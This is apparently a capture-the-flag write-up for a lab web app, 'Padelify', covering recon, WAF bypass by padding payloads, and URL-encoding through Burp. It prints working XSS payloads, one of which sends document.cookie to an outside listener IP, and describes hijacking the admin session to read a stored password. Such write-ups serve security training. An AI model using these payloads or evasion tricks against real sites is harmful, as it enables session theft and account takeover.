Post

Padelify

Padelify

Padelify

πŸ” Recon

First, I ran an nmap scan:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-25 03:45 UTC
Nmap scan report for ip-10-81-157-135.eu-west-1.compute.internal (10.81.157.135)
Host is up (0.00013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 05:10:95:2f:30:b1:0e:0e:91:68:6e:b8:fd:04:75:1c (ECDSA)
|_  256 73:19:a3:36:a0:ee:0c:09:ba:dc:0d:07:a7:94:39:a9 (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-title: Padelify - Tournament Registration
|_http-server-header: Apache/2.4.58 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.27 seconds

Then I ran feroxbuster for directory discovery(-a for user agent to bypass the WAF):

1
feroxbuster -u http://10.81.157.135/ -x php,html,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -a "Mozilla/5.0 (Linux; Android 12; PSD-AL00 Build/HUAWEIPSD-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/99.0.4844.88 Mobile Safari/537.36"

Pasted image 20260625105121.png

πŸ’‘ This is what we have β€” the page says:

Sign up and a moderator will approve your participation.

πŸ›‘οΈ WAF Detection & XSS Bypass

πŸ•΅οΈ Let’s check if there’s a WAF: Pasted image 20260625091736.png

Pasted image 20260625091920.png

Of course it has one β€” the challenge is all about bypassing it. Normal XSS doesn’t work as expected: Pasted image 20260625092854.png

πŸ’» I crafted a payload using a technique known as payload bloating β€” padding the input with junk characters so the WAF fails to match its signature:

1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<script>alert(1)</script>

That passed the WAF! Let’s go further:

1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<script>fetch('http://192.168.131.95:8080/test')</script>

The server started sending requests back: Pasted image 20260625094226.png

Now let’s grab the cookie:

1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<script>new Image().src="http://192.168.131.95:8080/?" + document['coo' + 'kie']</script>

After trying many payloads, this one worked and also bypassed the WAF: Pasted image 20260625102455.png

Pasted image 20260625102535.png

🏁 Got the cookie β€” and the first flag: Pasted image 20260625102639.png

πŸ† Admin Flag

πŸ“Œ First, I changed the password just in case: Pasted image 20260625102911.png

I started exploring the admin panel: Pasted image 20260625105354.png

Pasted image 20260625105432.png

When I tried index.php, it worked and redirected to dashboard.php: Pasted image 20260625105709.png

πŸ’‘ The old XSS payloads were still active β€” this could mean SSRF.

πŸ”„ SSRF via WAF Bypass

πŸ•΅οΈ I tried to access the config via SSRF: Pasted image 20260625105506.png

Blocked by the WAF again. Let’s try accessing it through live.php locally: Pasted image 20260625105924.png

Still blocked. To bypass the WAF, I opened Burp Suite and URL-encoded all characters in the request: Pasted image 20260625111714.png

Pasted image 20260625111811.png

In Burp: right-click β†’ Convert β†’ All characters: Pasted image 20260625112040.png

Pasted image 20260625112154.png

⚑ We got some information β€” the admin_info field contains the admin password: Pasted image 20260625112400.png

🏁 Logged in as admin and got the final flag!

This post is licensed under CC BY 4.0 by the author.